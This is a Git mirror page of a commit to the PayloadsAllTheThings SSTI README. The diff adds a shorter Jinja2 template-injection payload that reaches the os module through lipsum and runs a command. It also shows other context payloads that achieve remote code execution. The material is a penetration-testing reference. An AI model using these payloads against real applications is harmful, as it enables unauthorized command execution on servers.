wanderer/ PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-22 03:56:03 +02:00
Code Issues Releases Activity

Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings

This commit is contained in:
Swissky 2023-05-15 19:23:58 +02:00
parent 6adfe5d865 af4ade2a44
commit 0a07e07d00
1 changed files with 9 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
Server Side Template Injection/README.md
View File

@ -563,7 +563,7 @@ But when `__builtins__` is filtered, the following payloads are context-free, an
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
```
We can use these shorter payloads (this is the shorter payloads known yet):
We can use these shorter payloads:
```python
{{ cycler.__init__.__globals__.os.popen('id').read() }}
@ -573,6 +573,14 @@ We can use these shorter payloads (this is the shorter payloads known yet):
Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
```python
{{ lipsum.__globals__["os"].popen('id').read() }}
```
Source: https://twitter.com/podalirius_/status/1655970628648697860
#### Exploit the SSTI by calling subprocess.Popen
:warning: the number 396 will vary depending of the application.